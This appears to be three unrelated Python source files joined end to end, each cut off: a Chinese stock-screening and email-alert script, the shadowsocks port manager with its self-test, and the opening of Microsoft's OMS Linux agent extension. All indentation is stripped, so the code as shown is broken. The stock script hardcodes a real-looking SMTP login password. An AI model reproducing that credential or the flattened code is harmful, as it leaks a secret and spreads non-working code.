str101 = "\r\n\r\n\r\n\r\n\r\n策略11 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. MACD指标在60分钟周期形成金叉\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy10:
str101 = "\r\n\r\n\r\n\r\n\r\n策略10 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在60分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy9:
str101 = "\r\n\r\n\r\n\r\n\r\n策略9 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在30分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy8:
str101 = "\r\n\r\n\r\n\r\n\r\n策略8 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在日线周期形成金叉\r\n"
elif strategy_t == DataContext.strategy7:
str101 = "\r\n\r\n\r\n\r\n\r\n策略7 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上快线当前向上\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy5:
str101 = "\r\n\r\n\r\n\r\n\r\n策略5 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy4:
str101 = "\r\n\r\n\r\n\r\n\r\n策略4 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期至少持续纠缠4个周期\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy3:
str101 = "\r\n\r\n\r\n\r\n\r\n策略3 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期至少持续纠缠4个周期且小于30\r\n\r\n"
elif strategy_t == DataContext.strategy1:
str101 = "\r\n\r\n\r\n\r\n\r\n策略1 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. 收盘价在15分钟周期上穿70均线\r\n"
str101 += " 2. 成交量在15分钟周期大于80均线\r\n"
str101 += " 3. KD指标在30分钟周期形成金叉\r\n\r\n"
# str101 += " 4. OBV指标在30分钟周期大于零且大于30天均值\r\n\r\n"
elif strategy_t == DataContext.strategy2:
str101 = "\r\n\r\n\r\n\r\n\r\n策略2 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. 收盘价在60分钟周期不大于50\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉且金叉小于30\r\n\r\n"
elif strategy_t == DataContext.strategy1_2:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略2的预警条件:\r\n\r\n"
elif strategy_t == DataContext.strategy1_4:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略4的预警条件:\r\n\r\n"
content_tmp, content_em_tmp = output(str101)
emailcontent += content_tmp
emailcontent_em += content_em_tmp
return filename, emailcontent, filename_em, emailcontent_em
def sendemail(email_subject: str, email_content: str, recipient: str):
msg = EmailMessage()
msg["From"] = DataContext.email_recipient
msg["To"] = recipient
msg["Subject"] = email_subject
msg.set_content(email_content)
try:
with smtplib.SMTP_SSL("smtp.sina.com", 465) as smtp:
smtp.login(DataContext.email_recipient, "f7556624333b77f3")
smtp.send_message(msg)
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
else:
logger.info("Send %s an email %s successfully." % (recipient, email_subject))
def calconhistory(context: DataContext):
login_em()
loadsectors(context)
result = {datetime.datetime.now(): quantstrategies(context)}
handleresultlocked(mergeresult(context, result, ishistory=True), context)
logout_em()
def updatedatabaselocked(board: list, source: DataSource = DataSource.AK_SHARE):
retriedstocks = {}
loaddatainternal(board, 2, retried=retriedstocks, datasource=source)
reloaddata(retriedstocks)
logger.debug("Downloading data is done and thread id is {} and thread ident is {}".
format(threading.get_native_id(), threading.get_ident()))
def updatedatabase(is_auto=False, source: DataSource = DataSource.AK_SHARE, context: DataContext=None):
if is_auto:
timedelta = datetime.timedelta(minutes=10)
today = datetime.date.today()
time_download = datetime.datetime.combine(today, datetime.time(hour=16, minute=30))
while True:
if (datetime.datetime.now() - time_download) > timedelta:
break
else:
time.sleep(600)
if DataContext.iscountryChina():
if is_auto and source == DataSource.AK_SHARE:
loaddatainternal(DataContext.markets, 5, 5,
datasource=source, context=context)
return
if source == DataSource.EFINANCE:
updatedatabaselocked(DataContext.markets, source)
else:
global queue_history_data
reloaded_symbols = []
def execute_data_task():
queue_history_data.put((ProcessStatus.START, threading.get_ident()))
updatedatabaselocked(DataContext.markets, source)
queue_history_data.put((ProcessStatus.STOP, threading.get_ident()))
def execute_continue_data_task():
pass
def execute_watchdog_task():
last_board_symbol = None  # set once a (board, symbol) pair has been downloaded
timer = None  # threading.Timer armed by the watchdog below
def timer_func(thread_id: int):
if last_board_symbol is not None:
reloaded_symbols.append(last_board_symbol)
logger.debug("%s - %s needs to be reloaded." % last_board_symbol)
while True:
resultfromq = queue_history_data.get()
if isinstance(resultfromq, tuple) and len(resultfromq) == 2:
result_1 = resultfromq[0]
result_2 = resultfromq[1]
if isinstance(result_1, ProcessStatus) and result_1 == ProcessStatus.STOP \
and isinstance(result_2, int):
logger.debug("The thread {} of fetching data quited".format(result_2))
# stop timer
if timer is not None:
timer.cancel()
break
elif isinstance(result_1, ProcessStatus) and resultfromq[0] == ProcessStatus.START \
and isinstance(result_2, int):
logger.debug("The thread {} of fetching data was started".format(result_2))
# start timer
timer = threading.Timer(300, timer_func, (result_2,))
timer.start()
elif isinstance(result_1, tuple) and len(result_1) == 2 and isinstance(result_2,
threading.Event):
last_board_symbol = result_1
logger.debug("%s - %s has been downloaded." % last_board_symbol)
# restart timer
if timer is not None:
timer.cancel()
timer = threading.Timer(5, timer_func, (result_2,))
timer.start()
result_2.set()
def start_thread(target_func: list):
for tf in target_func:
thread = threading.Thread(target=tf)
thread.start()
threads.append(thread)
threads = []
'''
for market in DataContext.markets:
thread = threading.Thread(target=updatedatabaselocked, args=(market, source,))
thread.start()
threads.append(thread)
'''
# East Money has been obsoleted.
# loaddata(DataContext.markets, 2, datasource=DataSource.EAST_MONEY, period=240, type_func=2, isloginAlready=True)
start_thread([execute_watchdog_task, execute_data_task])
for thread in threads:
thread.join()
if not is_auto and getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
if DataContext.iscountryUS():
loaddata(DataContext.markets, 2, datasource=DataSource.YAHOO)
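# Watchdog protocol used by updatedatabase() above (a summary, not new code):
# download workers put tuples on queue_history_data and execute_watchdog_task
# arms or re-arms a threading.Timer accordingly:
#   (ProcessStatus.START, thread_ident)  -> arm a 300 s timer
#   ((board, symbol), threading.Event)   -> re-arm a 5 s timer, set the event
#   (ProcessStatus.STOP, thread_ident)   -> cancel the timer and exit
# If a timer fires before the next message arrives, the last (board, symbol)
# pair is queued for reload via reloaded_symbols.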
def login_em(isforcelogin: bool=True):
def mainCallback(quantdata):
"""
mainCallback is the main callback function; it captures the errors listed below.
It is passed as the third argument of the start function and takes a single parameter quantdata of type c.EmQuantData.
:param quantdata: c.EmQuantData
:return:
"""
logger.debug("mainCallback", str(quantdata))
# 登录掉线或者 登陆数达到上线(即登录被踢下线) 这时所有的服务都会停止
if str(quantdata.ErrorCode) == "10001011" or str(quantdata.ErrorCode) == "10001009":
logger.error("Your account is disconnect. You can force login automatically here if you need.")
# 行情登录验证失败(每次连接行情服务器时需要登录验证)或者行情流量验证失败时,会取消所有订阅,用户需根据具体情况处理
elif str(quantdata.ErrorCode) == "10001021" or str(quantdata.ErrorCode) == "10001022":
logger.error("Your all csq subscribe have stopped.")
# 行情服务器断线自动重连连续6次失败(1分钟左右)不过重连尝试还会继续进行直到成功为止,遇到这种情况需要确认两边的网络状况
elif str(quantdata.ErrorCode) == "10002009":
logger.error("Your all csq subscribe have stopped, reconnect 6 times fail.")
# 行情订阅遇到一些错误(这些错误会导致重连,错误原因通过日志输出,统一转换成EQERR_QUOTE_RECONNECT在这里通知),正自动重连并重新订阅,可以做个监控
elif str(quantdata.ErrorCode) == "10002012":
logger.error("csq subscribe break on some error, reconnect and request automatically.")
# 资讯服务器断线自动重连连续6次失败(1分钟左右)不过重连尝试还会继续进行直到成功为止,遇到这种情况需要确认两边的网络状况
elif str(quantdata.ErrorCode) == "10002014":
logger.error("Your all cnq subscribe have stopped, reconnect 6 times fail.")
# 资讯订阅遇到一些错误(这些错误会导致重连,错误原因通过日志输出,统一转换成EQERR_INFO_RECONNECT在这里通知),正自动重连并重新订阅,可以做个监控
elif str(quantdata.ErrorCode) == "10002013":
logger.error("cnq subscribe break on some error, reconnect and request automatically.")
# 资讯登录验证失败(每次连接资讯服务器时需要登录验证)或者资讯流量验证失败时,会取消所有订阅,用户需根据具体情况处理
elif str(quantdata.ErrorCode) == "10001024" or str(quantdata.ErrorCode) == "10001025":
logger.error("Your all cnq subscribe have stopped.")
else:
pass
try:
# call the login function (no username/password required after activation)
if isforcelogin:
loginparam = "TestLatency=1,ForceLogin=1"
else:
loginparam = "TestLatency=1"
loginResult = c.start(loginparam, '', mainCallback)
logger.debug(loginResult)
if loginResult.ErrorCode != 0:
logger.error("Choice quant -- login failed. ErrorCode is %d" % loginResult.ErrorCode)
login_em()
except Exception as ee:
logger.error("error >>>", ee)
logger.error("Choice quant -- login failed.")
traceback.print_exc()
login_em()
else:
logger.info("Choice quant -- login successful.")
def logout_em():
try:
logoutResult = c.stop()
logger.debug(logoutResult)
except Exception as ee:
logger.error("error >>>", ee)
logger.error("Choice quant -- logout failed")
traceback.print_exc()
else:
logger.info("Choice quant -- logout successful")
def pre_exec(country: CountryCode):
# EM has been obsoleted.
# login_em()
DataContext.initklz(country)
data_context = DataContext()
loadsectors(data_context)
return data_context
def post_exec(context: DataContext):
# EM has been obsoleted.
# updatedatabase(True, DataSource.EAST_MONEY)
# logout_em()
# FIXME: only for datasource AKShare
# updatedatabase(True, DataSource.SNAPSHOT, context)
updatedatabase(True, DataSource.EFINANCE)
if getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
def backtest(context: DataContext):
if DataContext.iscountryChina():
mins15 = 16
if DataContext.iscountryUS():
mins15 = 26
base = mins15 * 2
end_point = - mins15 - base
start_point = - 1 - base
results = {}
for stockdata in context.data15mins.values():
for key in stockdata.keys():
data = stockdata.get(key)
strategy_cross = CROSSUpMAAction(data)
valid, result_tmp = strategy_cross.executeaction(startindex=start_point, endindex=end_point,
cross_period=context.cross_sma_period,
greater_period=context.greater_than_sma_period)
if valid:
if len(result_tmp) > 0:
# result_tmp must be reversed because the start point is the last item.
reversed_result = result_tmp.iloc[::-1]
for row in reversed_result.itertuples(index=False):
if row[7]:
close_price = row[2]
times = 1.05
slot = -1
for i in range(-(end_point+mins15)):
if data.iloc[slot-i]['high'] >= close_price * times:
ret_earning = True
break
else:
ret_earning = False
results[key] = ret_earning
break
else:
print("strategy_cross_70 is failed on {}".format(key))
print("符合条件的股票共计: %d" % len(results))
win_stocks = []
for index, value in results.items():
if value:
win_stocks.append(index)
if len(results) == 0:
return
print("盈利的股票占比: {}%".format(len(win_stocks)/len(results)*100))
print("盈利的股票是:")
print(" ".join(win_stocks))
'''
login_em()
loadsectors(context)
logout_em()
sector_selected = context.sectors.get(SectorUS.sector_201001, [])
print("中概股共计: %d" % len(sector_selected))
result_selected = {}
for index in results:
if (isinstance(sector_selected, list) and index in sector_selected) or index == sector_selected:
result_selected[index] = results[index]
print("中概股中符合条件的股票共计: %d" % len(result_selected))
win_stocks = []
for index, value in result_selected.items():
if value:
win_stocks.append(index)
if len(result_selected) == 0:
return
print("盈利的股票占比: {}%".format(len(win_stocks) / len(result_selected) * 100))
print("盈利的股票是:")
print(" ".join(win_stocks))
'''
if __name__ == '__main__':
# ["创业板", "中小企业板", "主板A股", "主板", "科创板"]
# DataContext.initklz(CountryCode.CHINA)
# loaddata(["主板A股"], 2, datasource=DataSource.AK_SHARE)
# loaddata(["主板A股"], 3, c_point=600216, datasource=DataSource.AK_SHARE)
# login_em(isforcelogin=False)
# loaddata(["科创板"], 2, datasource=DataSource.EAST_MONEY)
# loaddata(DataContext.markets, 2, datasource=DataSource.EAST_MONEY, period=240, type_func=2)
dcon = pre_exec(CountryCode.CHINA)
# dcon = pre_exec(CountryCode.US)
t = threading.Thread(target=handleresult, args=(dcon,))
t.start()
snapshot(dcon)
time.sleep(60)
post_exec(dcon)
'''
DataContext.initklz(CountryCode.CHINA)
# updatedatabase(source=DataSource.EFINANCE)
loaddata(["科创板"], 2, datasource=DataSource.EFINANCE)
'''
# DataContext.country = CountryCode.CHINA
# checksymbols()
# DataContext.initklz(CountryCode.CHINA)
# backtest(DataContext())
# calconhistory(DataContext())
# quantstrategies(DataContext())
# login_em(isforcelogin=False)
# logout_em()
# updatedatabase(source=DataSource.EAST_MONEY)
# loadsectorsfromEM()
# reloaddata({})
# DataContext.country = CountryCode.US
# loaddata(["NASDAQ", "NYSE", "AMEX"], 2, datasource=DataSource.YAHOO)
# loaddata(["NASDAQ"], 3, c_point='AMBA', datasource=DataSource.YAHOO)
|
manager.py
|
from __future__ import absolute_import, division, print_function, \
with_statement
import errno
import traceback
import socket
import logging
import json
import collections
from shadowsocks import common, eventloop, tcprelay, udprelay, asyncdns, shell
BUF_SIZE = 1506
STAT_SEND_LIMIT = 100
class Manager(object):
def __init__(self, config):
self._config = config
self._relays = {} # (tcprelay, udprelay)
self._loop = eventloop.EventLoop()
self._dns_resolver = asyncdns.DNSResolver()
self._dns_resolver.add_to_loop(self._loop)
self._statistics = collections.defaultdict(int)
self._control_client_addr = None
try:
manager_address = config['manager_address']
if ':' in manager_address:
addr = manager_address.rsplit(':', 1)
addr = addr[0], int(addr[1])
addrs = socket.getaddrinfo(addr[0], addr[1])
if addrs:
family = addrs[0][0]
else:
logging.error('invalid address: %s', manager_address)
exit(1)
else:
addr = manager_address
family = socket.AF_UNIX
self._control_socket = socket.socket(family,
socket.SOCK_DGRAM)
self._control_socket.bind(addr)
self._control_socket.setblocking(False)
except (OSError, IOError) as e:
logging.error(e)
logging.error('can not bind to manager address')
exit(1)
self._loop.add(self._control_socket,
eventloop.POLL_IN, self)
self._loop.add_periodic(self.handle_periodic)
port_password = config['port_password']
del config['port_password']
for port, password in port_password.items():
a_config = config.copy()
a_config['server_port'] = int(port)
a_config['password'] = password
self.add_port(a_config)
def add_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.error("server already exists at %s:%d" % (config['server'],
port))
return
logging.info("adding server at %s:%d" % (config['server'], port))
t = tcprelay.TCPRelay(config, self._dns_resolver, False,
self.stat_callback)
u = udprelay.UDPRelay(config, self._dns_resolver, False,
self.stat_callback)
t.add_to_loop(self._loop)
u.add_to_loop(self._loop)
self._relays[port] = (t, u)
def remove_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.info("removing server at %s:%d" % (config['server'], port))
t, u = servers
t.close(next_tick=False)
u.close(next_tick=False)
del self._relays[port]
else:
logging.error("server not exist at %s:%d" % (config['server'],
port))
def handle_event(self, sock, fd, event):
if sock == self._control_socket and event == eventloop.POLL_IN:
data, self._control_client_addr = sock.recvfrom(BUF_SIZE)
parsed = self._parse_command(data)
if parsed:
command, config = parsed
a_config = self._config.copy()
if config:
# let the command override the configuration file
a_config.update(config)
if 'server_port' not in a_config:
logging.error('can not find server_port in config')
else:
if command == 'add':
self.add_port(a_config)
self._send_control_data(b'ok')
elif command == 'remove':
self.remove_port(a_config)
self._send_control_data(b'ok')
elif command == 'ping':
self._send_control_data(b'pong')
else:
logging.error('unknown command %s', command)
def _parse_command(self, data):
# commands:
# add: {"server_port": 8000, "password": "foobar"}
# remove: {"server_port": 8000"}
data = common.to_str(data)
parts = data.split(':', 1)
if len(parts) < 2:
return data, None
command, config_json = parts
try:
config = shell.parse_json_in_str(config_json)
return command, config
except Exception as e:
logging.error(e)
return None
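    # --- Illustrative sketch (editor's addition, not part of the original
    # module): the control protocol parsed above is plain text over UDP, in
    # the form "<command>: <json>". A minimal client exercising it could look
    # like this; the address is an assumption and must match the configured
    # manager_address.
    def _example_send_add_command(self):
        cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        cli.connect(('127.0.0.1', 6001))  # assumed manager_address
        cli.send(b'add: {"server_port": 8000, "password": "foobar"}')
        print(cli.recv(BUF_SIZE))  # expect b'ok'
        cli.close()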
def stat_callback(self, port, data_len):
self._statistics[port] += data_len
def handle_periodic(self):
r = {}
i = 0
def send_data(data_dict):
if data_dict:
# use compact JSON format (without space)
data = common.to_bytes(json.dumps(data_dict,
separators=(',', ':')))
self._send_control_data(b'stat: ' + data)
for k, v in self._statistics.items():
r[k] = v
i += 1
# split the data into segments that fit in UDP packets
if i >= STAT_SEND_LIMIT:
send_data(r)
r.clear()
send_data(r)
self._statistics.clear()
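    # --- Illustrative sketch (editor's addition): handle_periodic() above
    # flushes the statistics dict in chunks of STAT_SEND_LIMIT entries so that
    # each JSON payload fits comfortably in a single UDP datagram. The same
    # segmentation idea in isolation, as a generator:
    def _example_chunk_stats(self, stats, limit=STAT_SEND_LIMIT):
        chunk = {}
        for port, traffic in stats.items():
            chunk[port] = traffic
            if len(chunk) >= limit:
                yield dict(chunk)
                chunk.clear()
        if chunk:
            yield dict(chunk)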
def _send_control_data(self, data):
if self._control_client_addr:
try:
self._control_socket.sendto(data, self._control_client_addr)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
def run(self):
self._loop.run()
def run(config):
Manager(config).run()
def test():
import time
import threading
import struct
from shadowsocks import encrypt
logging.basicConfig(level=5,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
enc = []
eventloop.TIMEOUT_PRECISION = 1
def run_server():
config = {
'server': '127.0.0.1',
'local_port': 1081,
'port_password': {
'8381': 'foobar1',
'8382': 'foobar2'
},
'method': 'aes-256-cfb',
'manager_address': '127.0.0.1:6001',
'timeout': 60,
'fast_open': False,
'verbose': 2
}
manager = Manager(config)
enc.append(manager)
manager.run()
t = threading.Thread(target=run_server)
t.start()
time.sleep(1)
manager = enc[0]
cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cli.connect(('127.0.0.1', 6001))
# test add and remove
time.sleep(1)
cli.send(b'add: {"server_port":7001, "password":"asdfadsfasdf"}')
time.sleep(1)
assert 7001 in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
cli.send(b'remove: {"server_port":8381}')
time.sleep(1)
assert 8381 not in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
logging.info('add and remove test passed')
# test statistics for TCP
header = common.pack_addr(b'google.com') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'asdfadsfasdf', 'aes-256-cfb', 1,
header + b'GET /\r\n\r\n')
tcp_cli = socket.socket()
tcp_cli.connect(('127.0.0.1', 7001))
tcp_cli.send(data)
tcp_cli.recv(4096)
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = shell.parse_json_in_str(data)
assert '7001' in stats
logging.info('TCP statistics test passed')
# test statistics for UDP
header = common.pack_addr(b'127.0.0.1') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'foobar2', 'aes-256-cfb', 1,
header + b'test')
udp_cli = socket.socket(type=socket.SOCK_DGRAM)
udp_cli.sendto(data, ('127.0.0.1', 8382))
    udp_cli.close()  # close the UDP test socket (the original closed tcp_cli a second time)
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = json.loads(data)
assert '8382' in stats
logging.info('UDP statistics test passed')
manager._loop.stop()
t.join()
if __name__ == '__main__':
test()
|
omsagent.py
|
#!/usr/bin/env python
#
# OmsAgentForLinux Extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, so skip the import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import signal
import pwd
import grp
import re
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import watcherutil
import shutil
from threading import Thread
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
ProceedOnSigningVerificationFailure = True
PackagesDirectory = 'packages'
keysDirectory = 'keys'
# The bundle file name below is replaced at OMS build time.
BundleFileName = 'omsagent-0.0.0-0.universal.x64.sh'
GUIDRegex = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
GUIDOnlyRegex = r'^' + GUIDRegex + '$'
SCOMCertIssuerRegex = r'^[\s]*Issuer:[\s]*CN=SCX-Certificate/title=SCX' + GUIDRegex + ', DC=.*$'
SCOMPort = 1270
PostOnboardingSleepSeconds = 5
InitialRetrySleepSeconds = 30
IsUpgrade = False
# Paths
OMSAdminPath = '/opt/microsoft/omsagent/bin/omsadmin.sh'
OMSAgentServiceScript = '/opt/microsoft/omsagent/bin/service_control'
OMIConfigEditorPath = '/opt/omi/bin/omiconfigeditor'
OMIServerConfPath = '/etc/opt/omi/conf/omiserver.conf'
EtcOMSAgentPath = '/etc/opt/microsoft/omsagent/'
VarOMSAgentPath = '/var/opt/microsoft/omsagent/'
SCOMCertPath = '/etc/opt/microsoft/scx/ssl/scx.pem'
ExtensionStateSubdirectory = 'state'
# Commands
# Always use upgrade - will handle install if scx, omi are not installed or upgrade if they are.
InstallCommandTemplate = '{0} --upgrade'
UninstallCommandTemplate = '{0} --remove'
WorkspaceCheckCommand = '{0} -l'.format(OMSAdminPath)
OnboardCommandWithOptionalParams = '{0} -w {1} -s {2} {3}'
RestartOMSAgentServiceCommand = '{0} restart'.format(OMSAgentServiceScript)
DisableOMSAgentServiceCommand = '{0} disable'.format(OMSAgentServiceScript)
# Cloud Environments
PublicCloudName = "AzurePublicCloud"
FairfaxCloudName = "AzureUSGovernmentCloud"
MooncakeCloudName = "AzureChinaCloud"
USNatCloudName = "USNat" # EX
USSecCloudName = "USSec" # RX
DefaultCloudName = PublicCloudName # Fallback
CloudDomainMap = {
PublicCloudName: "opinsights.azure.com",
FairfaxCloudName: "opinsights.azure.us",
MooncakeCloudName: "opinsights.azure.cn",
USNatCloudName: "opinsights.azure.eaglex.ic.gov",
USSecCloudName: "opinsights.azure.microsoft.scloud"
}
# Error codes
DPKGLockedErrorCode = 55 # should be 56; kept at 55 temporarily so it is excluded from SLA accounting
InstallErrorCurlNotInstalled = 55 # should be 64; kept at 55 temporarily so it is excluded from SLA accounting
EnableErrorOMSReturned403 = 5
EnableErrorOMSReturnedNon200 = 6
EnableErrorResolvingHost = 7
EnableErrorOnboarding = 8
EnableCalledBeforeSuccessfulInstall = 52 # since install is a missing dependency
UnsupportedOpenSSL = 55 # should be 60; kept at 55 temporarily so it is excluded from SLA accounting
# OneClick error codes
OneClickErrorCode = 40
ManagedIdentityExtMissingErrorCode = 41
ManagedIdentityExtErrorCode = 42
MetadataAPIErrorCode = 43
OMSServiceOneClickErrorCode = 44
MissingorInvalidParameterErrorCode = 11
UnwantedMultipleConnectionsErrorCode = 10
CannotConnectToOMSErrorCode = 55
UnsupportedOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# OneClick Constants
ManagedIdentityExtListeningURLPath = '/var/lib/waagent/ManagedIdentity-Settings'
GUIDRegex = '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
OAuthTokenResource = 'https://management.core.windows.net/'
OMSServiceValidationEndpoint = 'https://global.oms.opinsights.azure.com/ManagedIdentityService.svc/Validate'
AutoManagedWorkspaceCreationSleepSeconds = 20
# agent permissions
AgentUser='omsagent'
AgentGroup='omiusers'
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.system('chmod {1} {0}'.format(ext_log_path, 700))
except:
pass
"""
What needs to be packaged for the signing verification to work:
keys
dscgpgkey.asc
msgpgkey.asc
packages
omsagent-*.universal.x64.asc
omsagent-*.universal.x64.sha256sums
"""
def verifyShellBundleSigningAndChecksum():
cert_directory = os.path.join(os.getcwd(), PackagesDirectory)
keys_directory = os.path.join(os.getcwd(), keysDirectory)
# import GPG key
dscGPGKeyFilePath = os.path.join(keys_directory, 'dscgpgkey.asc')
if not os.path.isfile(dscGPGKeyFilePath):
raise Exception("Unable to find the dscgpgkey.asc file at " + dscGPGKeyFilePath)
importGPGKeyCommand = "sh ImportGPGkey.sh " + dscGPGKeyFilePath
exit_code, output = run_command_with_retries_output(importGPGKeyCommand, retries = 0, retry_check = retry_skip, check_error = False)
# Check that we can find the keyring file
keyringFilePath = os.path.join(keys_directory, 'keyring.gpg')
if not os.path.isfile(keyringFilePath):
raise Exception("Unable to find the Extension keyring file at " + keyringFilePath)
# Check that we can find the asc file
bundleFileName, file_ext = os.path.splitext(BundleFileName)
ascFilePath = os.path.join(cert_directory, bundleFileName + ".asc")
if not os.path.isfile(ascFilePath):
raise Exception("Unable to find the OMS shell bundle asc file at " + ascFilePath)
# check that we can find the SHA256 sums file
sha256SumsFilePath = os.path.join(cert_directory, bundleFileName + ".sha256sums")
if not os.path.isfile(sha256SumsFilePath):
raise Exception("Unable to find the OMS shell bundle SHA256 sums file at " + sha256SumsFilePath)
# Verify the SHA256 sums file with the keyring and asc files
verifySha256SumsCommand = "HOME=" + keysDirectory + " gpg --no-default-keyring --keyring " + keyringFilePath + " --verify " + ascFilePath + " " + sha256SumsFilePath
exit_code, output = run_command_with_retries_output(verifySha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
raise Exception("Failed to verify SHA256 sums file at " + sha256SumsFilePath)
# Perform SHA256 sums to verify shell bundle
hutil_log_info("Perform SHA256 sums to verify shell bundle")
performSha256SumsCommand = "cd %s; sha256sum -c %s" % (cert_directory, sha256SumsFilePath)
exit_code, output = run_command_with_retries_output(performSha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
